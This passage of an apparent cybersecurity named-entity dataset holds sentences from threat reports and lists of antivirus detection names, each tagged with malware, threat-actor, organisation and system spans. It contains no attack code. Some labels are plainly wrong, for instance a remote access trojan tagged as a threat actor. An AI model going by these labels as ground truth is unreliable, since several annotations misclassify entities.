TrojanSpy.Delf Virus.Win32.Indcu.A.200014 Win32.Induc Virus.Win32.Induc.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000923", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Geral!O Trojan.KillAV.Win32.4515 Trojan/KillAV.nka Trojan.Dropper.18 Trojan.KillAV Win32/Tnega.AANE Trojan.Win32.Drop.csaym Trojan.Win32.A.Downloader.44432[UPX] TrojWare.Win32.TrojanDownloader.Geral.djfl Trojan.MulDrop2.15 BehavesLike.Win32.Backdoor.pc Trojan.Win32.Claretore Trojan/Win32.Unknown Trojan:Win32/Bodime.C Win-Trojan/Inject.43892 Trojan.KillAV!AN0QbvE+MIE Win32/Trojan.BO.785", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000924", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan.YRTS-5407 Trojan.MSIL.Androm.3 HackTool:MSIL/Boilod.C!bit Trojan/Win32.Boilod.C2311288", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000926", "source": "cyner2_train"}} {"text": "The Trojan's technical details and the vectors of its propagation were recently described in the blog by Unit42.", "spans": {"MALWARE: Trojan's": [[4, 12]], "ORGANIZATION: Unit42.": [[105, 112]]}, "info": {"id": "cyner2_train_000927", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanAPT.LecnaCShip.MUE.Z4 Win32.Trojan.WisdomEyes.16070401.9500.9955 Infostealer.Spasip Trojan.Win32.ShipUp.bbuken Trojan.MulDrop4.6955 Trojan/ShipUp.hh TR/Drop.ShipUp.vauvq Worm:Win32/Shup.A Trojan/Win32.ShipUp.R191080 Trj/CI.A W32/Lecna.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000928", "source": "cyner2_train"}} {"text": "A backdoor also known as: RiskWare.SecurityXploded W32/Trojan.BXPP-2784 Win32.Riskware.Passdump.A Trojan.Win32.Stealer.dbmdyq Trojan.PWS.Stealer.13033 RiskWare[PSWTool]/Win32.PasswordCracker Unwanted/Win32.HackTool.R117574 not-a-virus:PSWTool.PasswordCracker HackTool.Samples 
Win32/Virus.PSW.c09", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000931", "source": "cyner2_train"}} {"text": "The domain was hosted by an IP address assigned to ito.gov[.]ir - The Iranian Ministry of Communication and Information Technology.", "spans": {"ORGANIZATION: The Iranian Ministry of Communication and Information Technology.": [[66, 131]]}, "info": {"id": "cyner2_train_000936", "source": "cyner2_train"}} {"text": "Since at least November 2018, ITG03 actors have stolen money from ATMs in Asia and Africa, according to U.S. Government sources and Symantec.", "spans": {"THREAT_ACTOR: ITG03 actors": [[30, 42]], "SYSTEM: ATMs": [[66, 70]], "ORGANIZATION: U.S. Government sources": [[104, 127]], "ORGANIZATION: Symantec.": [[132, 141]]}, "info": {"id": "cyner2_train_000938", "source": "cyner2_train"}} {"text": "DDE traditionally allows for the sending of messages between applications that share data, for example from Word to Excel or vice versa.", "spans": {"SYSTEM: DDE": [[0, 3]], "SYSTEM: Word": [[108, 112]], "SYSTEM: Excel": [[116, 121]]}, "info": {"id": "cyner2_train_000939", "source": "cyner2_train"}} {"text": "Over the past few months, we've been following a new type of worm we named PhotoMiner.", "spans": {"MALWARE: worm": [[61, 65]], "MALWARE: PhotoMiner.": [[75, 86]]}, "info": {"id": "cyner2_train_000943", "source": "cyner2_train"}} {"text": "Researchers at Lumen Black Lotus Labs have identified a never-before-seen campaign involving compromised routers.", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "ORGANIZATION: Lumen Black Lotus Labs": [[15, 37]], "THREAT_ACTOR: campaign": [[74, 82]], "SYSTEM: compromised routers.": [[93, 113]]}, "info": {"id": "cyner2_train_000947", "source": "cyner2_train"}} {"text": "It infects business-grade routers and deploys two malicious binaries, including a Remote Access Trojan RAT called HiatusRAT, and a variant of tcpdump that enables packet capture on the target device.", "spans": 
{"SYSTEM: routers": [[26, 33]], "MALWARE: a Remote Access Trojan RAT": [[80, 106]], "MALWARE: HiatusRAT,": [[114, 124]], "SYSTEM: target device.": [[185, 199]]}, "info": {"id": "cyner2_train_000948", "source": "cyner2_train"}} {"text": "Once the device is compromised, a process of sophisticated intelligence gathering starts, exploiting the ability to access the phone's video and audio capabilities, SMS functions, and location.", "spans": {"SYSTEM: device": [[9, 15]], "VULNERABILITY: exploiting": [[90, 100]]}, "info": {"id": "cyner2_train_000949", "source": "cyner2_train"}} {"text": "Zscaler's cloud sandboxes recently detected a Remote Access Trojan RAT being delivered by a well-known Chinese cyber espionage group using the Hacking Team's 0-day exploits.", "spans": {"ORGANIZATION: Zscaler's cloud": [[0, 15]], "SYSTEM: sandboxes": [[16, 25]], "THREAT_ACTOR: Remote Access Trojan RAT": [[46, 70]], "THREAT_ACTOR: Chinese cyber espionage": [[103, 126]], "ORGANIZATION: Hacking": [[143, 150]], "ORGANIZATION: Team's": [[151, 157]], "MALWARE: 0-day exploits.": [[158, 173]]}, "info": {"id": "cyner2_train_000951", "source": "cyner2_train"}} {"text": "Most of the IP addresses belong to known bulletproof hosting networks that advertise their services on different forums.", "spans": {"ORGANIZATION: bulletproof hosting networks": [[41, 69]]}, "info": {"id": "cyner2_train_000953", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Startpage.MP3 W32/Trojan2.NCFX Downloader.BBNK Win32/SillyDl.WLY Trojan.Downloader-96481 Trojan.Win32.A.Downloader.274432.H Trojan.DownLoad2.14890 TROJ_DLOAD.SMCV Heuristic.BehavesLike.Win32.AdSpyware.H TrojanDownloader:Win32/Sysfade.B W32/Trojan.QIXU-7273 HeurEngine.MaliciousPacker Win32/StartPage.NVY Trojan.Win32.Fednu.amu Trojan.Win32.StartPage Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000955", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGamesLTSHWDN.Trojan 
Trojan.Azberg.B Trojan.Skeeyah Dropper.FrauDrop.Win32.3255 Backdoor.W32.Azbreg.miLK TSPY_AZBREG_BL132B01.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Dropper TSPY_AZBREG_BL132B01.TOMC Win.Trojan.Azberg-1 Trojan.Azberg.B Trojan-Downloader.Win32.Bandit.ey Trojan.Azberg.B Trojan.Win32.Azbreg.dtleix Trojan.Win32.Z.Azbreg.209435 Trojan.Azberg.B W32/Trojan.QMPY-2353 Win32.Hack.Azbreg.a.kcloud Trojan.Azberg.B Trojan-Downloader.Win32.Bandit.ey Trojan:Win32/HistBoader.A Backdoor/Win32.Azbreg.R29412 Trojan.Azberg.B Trj/CI.A Win32.Trojan-downloader.Bandit.Sxef Backdoor.Azbreg!vdtQoRBMLTw Trojan.Crypt Win32/Trojan.Dropper.e71", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000956", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9983 Trojan.Heriplor Trj/CI.A Trojan.Rogue!T/cJXL8TDNE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000957", "source": "cyner2_train"}} {"text": "It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.", "spans": {"ORGANIZATION: organizations": [[40, 53]], "ORGANIZATION: industries": [[66, 76]]}, "info": {"id": "cyner2_train_000958", "source": "cyner2_train"}} {"text": "For years now, criminals behind banking Trojans, remote access tools RATs and other types of malware have targeted Microsoft Windows hosts in Brazil through malicious spam malspam.", "spans": {"THREAT_ACTOR: criminals": [[15, 24]], "MALWARE: banking Trojans, remote access tools RATs": [[32, 73]], "MALWARE: malware": [[93, 100]], "SYSTEM: Microsoft Windows hosts": [[115, 138]]}, "info": {"id": "cyner2_train_000959", "source": "cyner2_train"}} {"text": "Palo Alto Networks researchers recently discovered a family of malware, designated ProxyBack, and observed over 20 versions that have been used to infect systems as far back as March 2014.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], 
"MALWARE: family of malware,": [[53, 71]], "MALWARE: ProxyBack,": [[83, 93]], "MALWARE: 20 versions": [[112, 123]], "SYSTEM: systems": [[154, 161]]}, "info": {"id": "cyner2_train_000963", "source": "cyner2_train"}} {"text": "The malicious ads would automatically no click required redirect users to a casino website used as decoy to silently load malicious iframes from disposable domains which ultimately lead to the Angler exploit kit.", "spans": {"MALWARE: Angler exploit kit.": [[193, 212]]}, "info": {"id": "cyner2_train_000964", "source": "cyner2_train"}} {"text": "Typically, other exploit kits make an effort to hide their exploits.", "spans": {"MALWARE: exploit kits": [[17, 29]], "MALWARE: exploits.": [[59, 68]]}, "info": {"id": "cyner2_train_000965", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Badoor.2.0 Backdoor.Win32.Zemac!O Backdoor.Badoor.2.0 W32/VBTrojan.19G!Maximus BKDR_ZEMAC.B Win.Trojan.Zemac-1 Backdoor.Win32.Zemac.b Backdoor.Badoor.2.0 Trojan.Win32.Zemac.fypm Backdoor.Badoor.2.0 TrojWare.Win32.BackDoor.2_0 Backdoor.Badoor.2.0 BackDoor.Zemac.200 BKDR_ZEMAC.B W32/VBTrojan.19G!Maximus Backdoor/Zemac.b TR/Zemac.B Trojan[Backdoor]/Win32.Zemac Backdoor:Win32/Zemac.B Backdoor.Win32.Zemac.b Backdoor.Badoor.2.0 Backdoor.Badoor.2.0 Backdoor.Zemac Win32/BackDoor.2_0 W32/Bdoor.AR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000966", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Flooder.Intelirc.1.5 Trojan.Flooder.Intelirc.1.5 Trojan.Flooder.Intelirc.1.5 Trojan.Flooder.Intelirc.1.5 Flooder.Win32.IntelIRC.15 Trojan.Flooder.Intelirc.1.5 Trojan.Win32.IntelIRC.dicf Flooder.W32.IntelIRC.15!c Trojan.Flooder.Intelirc.1.5 TrojWare.Win32.Flooder.IntelIRC.15 Trojan.Flooder.Intelirc.1.5 BackDoor.Spieluhr Tool.IntelIRC.Win32.1 Flooder.IntelIRC.b HackTool[Flooder]/Win32.IntelIRC Flooder.Win32.IntelIRC.15 Flooder.IntelIRC Win32/Flooder.IntelIRC.15 Trojan.Win32.Flooder Malware_fam.gw", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000967", "source": "cyner2_train"}} {"text": "Talos continuously monitors malicious emails campaigns.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "THREAT_ACTOR: malicious emails campaigns.": [[28, 55]]}, "info": {"id": "cyner2_train_000970", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Slackbot.8329 Backdoor.Win32.Slackbot!O Backdoor/Slackbot.b TROJ_DLDER.A Win32.Trojan.WisdomEyes.16070401.9500.9979 W32/Slackbot.B Backdoor.Slackbot.10 Win32/Slack.10 TROJ_DLDER.A Win.Trojan.Slackbot-1 Backdoor.Win32.Slackbot.b Trojan.Win32.Slackbot.bmpwl Backdoor.Win32.Slackbot.7712 Virus.Malware.Sidldg!c Backdoor.Win32.Slackbot.B BackDoor.IRC.Sdbot.13459 Backdoor.Slackbot.Win32.28 BehavesLike.Win32.Downloader.xh Backdoor.Win32.Slackbot W32/Slackbot.TGFH-5934 Trojan/PSW.Magania.imu BDS/SlackBot.B1 Trojan[Backdoor]/Win32.Slackbot Backdoor:Win32/Slackbot.D Backdoor.Slackbot Backdoor.Win32.Slackbot.b Win-Trojan/Slackbot.8329 Backdoor.Slackbot Bck/Slackbot.Be Win32/Slackbot.B Trojan.Slackbot.B W32/Slackbot.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000971", "source": "cyner2_train"}} {"text": "A few months ago, we covered the ChessMaster cyberespionage campaign, which leveraged a variety of toolsets and malware such as ChChes and remote access trojans like RedLeaves and PlugX to compromise its targets—primarily organizations in Japan.", "spans": {"THREAT_ACTOR: the ChessMaster cyberespionage campaign,": [[29, 69]], "MALWARE: toolsets": [[99, 107]], "MALWARE: malware": [[112, 119]], "MALWARE: ChChes": [[128, 134]], "MALWARE: remote access trojans": [[139, 160]], "MALWARE: RedLeaves": [[166, 175]], "MALWARE: PlugX": [[180, 185]], "ORGANIZATION: organizations": [[222, 235]]}, "info": {"id": "cyner2_train_000974", "source": "cyner2_train"}} {"text": "Based on the leaked code , the RCSAndroid app can do the following intrusive routines to spy on targets : Capture 
screenshots using the “ screencap ” command and framebuffer direct reading Monitor clipboard content Collect passwords for Wi-Fi networks and online acco ; .unts , including Skype , Facebook , Twitter , Google , WhatsApp , Mail , and LinkedIn Record using the microphone Collect SMS , MMS , and Gmail messages Record location Gather device information Capture photos using the front and back cameras Collect contacts and decode messages from IM accounts , including Facebook Messenger , WhatsApp , Skype , Viber , Line , WeChat , Hangouts , Telegram , and BlackBerry Messenger .", "spans": {"MALWARE: RCSAndroid": [[31, 41]], "SYSTEM: Skype": [[288, 293], [612, 617]], "SYSTEM: Facebook": [[296, 304]], "SYSTEM: Twitter": [[307, 314]], "SYSTEM: Google": [[317, 323]], "SYSTEM: WhatsApp": [[326, 334], [601, 609]], "SYSTEM: Mail": [[337, 341]], "SYSTEM: LinkedIn": [[348, 356]], "SYSTEM: Gmail": [[409, 414]], "SYSTEM: Facebook Messenger": [[580, 598]], "SYSTEM: Viber": [[620, 625]], "SYSTEM: Line": [[628, 632]], "SYSTEM: WeChat": [[635, 641]], "SYSTEM: Hangouts": [[644, 652]], "SYSTEM: Telegram": [[655, 663]], "SYSTEM: BlackBerry Messenger": [[670, 690]]}, "info": {"id": "cyner2_train_000975", "source": "cyner2_train"}} {"text": "As part of this breach, the media organization's website was being leveraged as a component of a malware campaign targeting select visitors.", "spans": {"THREAT_ACTOR: malware campaign": [[97, 113]], "ORGANIZATION: visitors.": [[131, 140]]}, "info": {"id": "cyner2_train_000978", "source": "cyner2_train"}} {"text": "The buyer can then choose to host/spread/distribute it in whatever way they see fit - as opposed to some of the more recent turn-key offerings like Ransom32, ORX-Locker, or Encryptor RAAS, which lack a full administrative panel and other customization features present in a fully packaged malware kit'.", "spans": {"THREAT_ACTOR: buyer": [[4, 9]], "MALWARE: Ransom32, ORX-Locker,": [[148, 169]], "MALWARE: Encryptor RAAS,": [[173, 188]], 
"MALWARE: malware kit'.": [[289, 302]]}, "info": {"id": "cyner2_train_000979", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.HLLP.Delf.B Worm.Niklas RiskWare.Tool.CK Win32.HLLP.Delf.B Win32.Trojan.WisdomEyes.16070401.9500.9630 W32.HLLW.Niklas Win32.HLLP.Delf.B Virus.Win32.HLLP.Delf.b Win32.HLLP.Delf.B Trojan.Win32.Niklas.hekr Trojan.Dropper/Packed Win32.HLLP.Delf.B TrojWare.Win32.Patched.KSU Win32.HLLP.Delf.B Win32.HLLW.Atmetka Virus.Delf.Win32.30 BehavesLike.Win32.Downloader.lc Worm:Win32/Niklas.C W32/Hllp.Delf.E Worm:Win32/Niklas.C W32.HLLP.Delf.b!c Virus.Win32.HLLP.Delf.b Trojan/Win32.Xema.C36267 Win32.HLLP.Delf.B Win32.Virus.Hllp.Dztg HLLP.Delf.SV1 Trojan-PWS.Win32.Lmir.awg W32/HLLP.DELF.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000980", "source": "cyner2_train"}} {"text": "Websense Security Labs researchers have been monitoring a mass scale malvertising campaign that leads to Angler Exploit Kit.", "spans": {"ORGANIZATION: Websense Security Labs": [[0, 22]], "THREAT_ACTOR: malvertising": [[69, 81]], "THREAT_ACTOR: campaign": [[82, 90]], "MALWARE: Angler Exploit Kit.": [[105, 124]]}, "info": {"id": "cyner2_train_000982", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Win32.Worm.Autorun.VN Virus.Win32.Virut.1!O W32.Virut.G Win32.Worm.Autorun.VN W32.W.Bnf.tnnw Win32.Worm.Autorun.VN W32.SillyFDC Win32/Virut.17408 WORM_OTORUN.SMXY Win.Trojan.VB-73727 Worm.Win32.AutoRun.hfp Win32.Worm.Autorun.VN Trojan.Win32.Autoruner1.csgwlt Worm.Win32.Autorun.afe Win32.Worm.Autorun.VN Virus.Win32.Virut.CE Win32.Worm.Autorun.VN Win32.Virut.56 WORM_OTORUN.SMXY BehavesLike.Win32.Gupboot.ht Worm.Win32.AutoRun Win32/Virut.bv WORM/Autorun.hfp Trojan/Win32.Unknown Worm:Win32/Wecykler.A Worm.Win32.AutoRun.364544.A Worm.Win32.AutoRun.hfp HEUR/Fakon.mwf W32/Autorun.worm.aaav Worm.AutoRun.Silly Backdoor.Bot Worm.AutoRun!iW63fF1TdWk W32/AutoRun.GP!worm W32/Sality.AO Worm.Win32.FakeFolder.BY", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000983", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameXLIIUAAR.Trojan Backdoor.Win32.Xtobox!O Backdoor/Xtob.m Win32.Trojan.WisdomEyes.16070401.9500.9787 W32/Risk.CVOB-2286 Win32/Tnega.AKCE Win.Trojan.Xtob-2 Backdoor.Win32.Xtob.m Trojan.Win32.Scar.bqzdl Backdoor.Win32.A.Xtob.118784[UPX] Backdoor.W32.Xtob!c BackDoor.Piroxcc TSPY_YAHOS_CD1000EC.RDXN BehavesLike.Win32.Dropper.dz Trojan.Win32.Scar W32/MalwareS.BFOO Trojan/Cosmu.drs Trojan[Backdoor]/Win32.Xtob Backdoor.Win32.Xtob.m Trojan:Win32/Scar.V Trojan/Win32.Scar.C104448 Backdoor.Xtob Win32.Backdoor.Xtob.Dyzl Trojan.Scar!bp+jOb+ovfY Win32/Backdoor.f23", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000985", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Ransom.Win32.VB!O Trojan.VB Trojan.Infidesgate Win32/Adslock.A Trojan-Ransom.Win32.VB.du Troj.Ransom.W32!c Trojan.DownLoader4.48837 BehavesLike.Win32.Trojan.nz Trojan-Ransom.Win32.VB Trojan[Ransom]/Win32.VB Ransom:Win32/Adslock.A Trojan-Ransom.Win32.VB.du Trojan/Win32.HDC.C94839 Win32.Trojan.Vb.Piah Trojan.ATRAPS!J/1Dm4j1sNA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000986", "source": "cyner2_train"}} {"text": "A backdoor also known as: Dropper.Sysn.Win32.882 Trojan.Win32.Spammer.dchmhr Trojan-Dropper.Win32.Sysn.ailj Trojan.DR.Sysn! 
Trojan.Spambot.12672 TR/Dynamer.ac.1747 Trojan[Dropper]/Win32.Sysn Win32.Troj.Sysn.ai.kcloud W32/Sysn.AILJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000990", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.36864.BLO Win32.Trojan.WisdomEyes.16070401.9500.9887 Trojan.Win32.Small.vptjr Backdoor.Win32.Huigezi.oba BackDoor.IRC.NgrBot.189 Trojan.Zusy.D3B9D Trojan:Win32/Gutosver.A Trojan/Win32.Scar.R90823 TScope.Malware-Cryptor.SB W32/Small.NHC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000991", "source": "cyner2_train"}} {"text": "In this post we describe the technical details about a newly observed campaign of the notorious Crypt0l0cker aka TorrentLocker or Teerac ransomware.", "spans": {"THREAT_ACTOR: campaign": [[70, 78]], "MALWARE: Crypt0l0cker": [[96, 108]], "MALWARE: TorrentLocker": [[113, 126]], "MALWARE: Teerac ransomware.": [[130, 148]]}, "info": {"id": "cyner2_train_000992", "source": "cyner2_train"}} {"text": "Most online ads are displayed as a result of a chain of trust, from the publishers to the malicious advertiser via ad agencies and/or ad networks.", "spans": {}, "info": {"id": "cyner2_train_000993", "source": "cyner2_train"}} {"text": "The Android version was a hit from the get-go, and it was one of 2014 s most active Android threats, being detected in multiple campaigns during that year [1, 2, 3], including one that leveraged an SMS worm to automate and boost its infection process.", "spans": {"SYSTEM: Android": [[4, 11], [84, 91]], "THREAT_ACTOR: multiple campaigns": [[119, 137]]}, "info": {"id": "cyner2_train_000994", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.Spy.W32.Zbot.touj Trojan.Razy.D164A7 Win32.Trojan.WisdomEyes.16070401.9500.9649 Trojan.Win32.Zbot.eljrsb Trojan.Win32.Zbot.44544.AI Trojan.DownLoader22.26316 TrojanSpy.Zbot.fgio Trojan[Spy]/Win32.Zbot TrojanDownloader:Win32/Smordess.A", "spans": {"MALWARE: backdoor": 
[[2, 10]]}, "info": {"id": "cyner2_train_000995", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodceb.Trojan.2ec7 Trojan.Downloader.Delf.ER Trojan.Downloader.Delf.ER Downloader.Delf.Win32.5663 Trojan/Downloader.Delf.er Trojan.DL.Delf!VxwiJYoF8rw W32/Downloader.VRCK-6872 Trojan-Downloader.Win32.Delf.er Trojan.Downloader.Delf.ER Trojan.Win32.Delf.gudt Trojan.Win32.Downloader.17920.FB Trojan.Downloader.Delf.ER Trojan.Downloader.Delf.ER BehavesLike.Win32.PWSOnlineGames.lh W32/Downldr2.CMGJ TrojanDownloader.Dfg.a Trojan/Win32.Oirec Win32.Troj.Delf.er.kcloud PWS:Win32/Hacksoft.E Trojan.Downloader.Delf.ER Win-Trojan/Xema.variant TrojanDownloader.Delf Win32/TrojanDownloader.Delf.ER Win32.Trojan-downloader.Delf.Akoy Trojan-PWS.Win32.QQPass W32/DelpDldr.F!tr Downloader.Delf.4.BS Trojan.Win32.Delf.AVva", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000998", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Gedza.c Trojan.Symmi.D54D9 Win32.Trojan.WisdomEyes.16070401.9500.9785 W32/P2P_Worm.TWVI-7072 W32.SillyP2P Win.Trojan.Aitselom-1 P2P-Worm.Win32.Gedza.c Trojan.Win32.Gedza.empl W32.W.Gedza.c!c Worm.Win32.Gedza.C Win32.HLLW.Aitselom Worm.Gedza.Win32.3 Worm.Win32.Gedza W32/P2PWorm.GQ Worm/Gedza.c Worm:Win32/Gedza.C WORM/Gedza.C.1 Worm[P2P]/Win32.Gedza Worm.Gedza.c.kcloud Worm:Win32/Gedza.C P2P-Worm.Win32.Gedza.c TScope.Trojan.Delf W32/Gedza.F.worm Win32/Gedza.C Worm.P2P.Gedza!r6gvDWKTb4U W32/Delf.NHN!tr Win32/Worm.a05", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000999", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.Kangaroo Win32.Trojan.WisdomEyes.16070401.9500.9872 Trojan.Randsom.A Ransom_Apocalypse.R039C0DAT18 Win32.Trojan-Ransom.Apocalypse.D Trojan-Ransom.Win32.Kangar.a Trojan.Win32.Filecoder.epdfna Trojan.Encoder.5883 Ransom_Apocalypse.R039C0DAT18 BehavesLike.Win32.Worm.lt W32/Trojan.ATNA-2545 Ransom:Win32/Apocalypse.A!bit Trojan-Ransom.Win32.Kangar.a 
Trojan/Win32.Kangaroo.R194907 Trj/GdSda.A Trojan.Mikey.D127AA Win32/Filecoder.NIC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001001", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.AceDeciever.15 Trojan:Win32/AceDeceiver.A Trojan.Win32.Acedeceiver", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001002", "source": "cyner2_train"}} {"text": "The last time I saw proshuto8.exe it was Trickbot, but these malware gangs do mix match and reuse file names and delivery methods to deliver multiple different malwares.", "spans": {"MALWARE: Trickbot,": [[41, 50]], "THREAT_ACTOR: malware gangs": [[61, 74]], "MALWARE: malwares.": [[160, 169]]}, "info": {"id": "cyner2_train_001003", "source": "cyner2_train"}} {"text": "A backdoor also known as: PE:Malware.XPACK/RDM!5.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001005", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Dropper.ALXP Trojan.Dropper Trojan.Dropper-23429 Trojan-Dropper.Win32.Injector.hrpm Exploit.Servu!8cjzV0go40I Trojan.MulDrop.30820 Muster.c W32/Risk.XPXS-2512 TR/Expl.Servu.AK Trojan/Win32.Sasfis TrojanDropper:Win32/Apptom.B Virus.Win32.Part.a BScope.Trojan.Win32.Inject.2 Exploit.Win32.Servu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001006", "source": "cyner2_train"}} {"text": "The overwriting of the data files will make it extremley difficult and costly, if not impossible, to recover the data using standard forensic methods.", "spans": {}, "info": {"id": "cyner2_train_001011", "source": "cyner2_train"}} {"text": "Android.Bankosy is a Trojan horse for Android devices that steals information from the compromised device.", "spans": {"MALWARE: Trojan horse for": [[21, 37]], "SYSTEM: Android devices": [[38, 53]], "SYSTEM: compromised device.": [[87, 106]]}, "info": {"id": "cyner2_train_001012", "source": "cyner2_train"}} {"text": "Series of attacks mostly against 
Israel-based organisations.", "spans": {"ORGANIZATION: Israel-based organisations.": [[33, 60]]}, "info": {"id": "cyner2_train_001013", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnlineGameGLISC.Trojan W32/Mydoom.cf.dll WORM_MYDOOM.EA W32/Downloader.EZUZ-6892 Trojan.Dozer Win32/Mydoom.BS WORM_MYDOOM.EA Win.Downloader.73527-1 DDoS.Config.6 W32/Mydoom.cf.dll Trojan.Win32.Lyzapo W32/Downldr2.FZUB W32.Trojan.Worm-myDoom Trojan:Win32/Lyzapo.A Trojan/Win32.DDoS.R528 W32/MyDoom.HN.worm Win32/Lyzapo.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001019", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Win32.Theefdl Trojan-Downloader.Win32!O Trojandownloader.Theefdl Downloader.Theefdl.Win32.5 TrojanDownloader.Win32.Theefdl W32/Theef.G@bd Downloader.Trojan Win32/TrojanDownloader.Theefdl TROJ_THEEFDL.A TrojanDownloader.Win32.Theefdl Trojan-Downloader.Win32.Theefdl TrojanDownloader.Win32.Theefdl Trojan.Win32.Theefdl.fydt Trojan.Win32.A.Downloader.81920.VZ TrojanDownloader.Win32.Theefdl TrojWare.Win32.TrojanDownloader.Theefdl Trojan.Thedl BehavesLike.Win32.Backdoor.mh Trojan-Downloader.Win32.Theefdl W32/Theef.TVQD-5666 TrojanDownloader.Theefdl Trojan[Downloader]/Win32.Theefdl TrojanDownloader:Win32/Theefdl.1_0 Trojan/Win32.Downloader.R94200 Trojan-Downloader.Win32.Theefdl TrojanDownloader.Win32.Theefdl TrojanDownloader.Theefdl Trojan.DL.Theefdl!lWNJHAF8U1M W32/Theefdl.G!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001020", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NSAnti.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Riskware.NoobyProtect.B Trojan.Win32.NobodyProtect.eviakq TrojWare.Win32.Amtar.KNB Trojan.DownLoader4.12788 BehavesLike.Win32.Pate.tc Trojan:Win32/Gee.B Dropper/Win32.PcClient.R6061 Trojan.Cryptic", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001022", "source": "cyner2_train"}} {"text": "At 
the same time, in previous update activities, due to the setting of a specific named planned task, the researchers named it Blue Tea Action based on the name and Operation Black Ball 。", "spans": {"ORGANIZATION: the researchers": [[102, 117]], "MALWARE: Blue Tea Action": [[127, 142]], "THREAT_ACTOR: Operation Black Ball": [[165, 185]]}, "info": {"id": "cyner2_train_001023", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SunimodG.Trojan Worm.Win32.Juched!O WORM_GANELP.SMIA W32.Griptolo WORM_GANELP.SMIA Win.Worm.Autorun-9195 Worm.Win32.Juched.209429 Worm.Win32.Jushed.KA Trojan.Proxy.20270 Trojan.Win32.Webprefix W32.Worm.Ganelp Worm/Win32.Juched Worm.Juched.d.kcloud Worm:Win32/Ganelp.E Trojan/Win32.Npkon.R18258 Worm.Juched Trojan.FakeJava Trojan.Win32.FakeFolder.bba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001024", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.WpechkLTD.Trojan Trojan-Spy/W32.Vskim.160256 Trojan.Mauvaise.SL1 Dropper.Dapato.Win32.16801 Trojan/Spy.POSCardStealer.k Win32.Trojan.WisdomEyes.16070401.9500.9904 Backdoor.Trojan BKDR_HESETOX.SMJ Trojan.Win32.Vskim.cqipth Backdoor.Win32.Hesetox.160260 Trojan.DownLoader8.15980 BKDR_HESETOX.SMJ BehavesLike.Win32.Dropper.ch Trojan[Dropper]/Win32.Dapato Backdoor:Win32/Hesetox.A Win-Trojan/Hesetox.160256 TrojanSpy.Vskim Backdoor.Bot.X Backdoor.Win32.Hesetox Win32/Trojan.IM.73c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001025", "source": "cyner2_train"}} {"text": "A 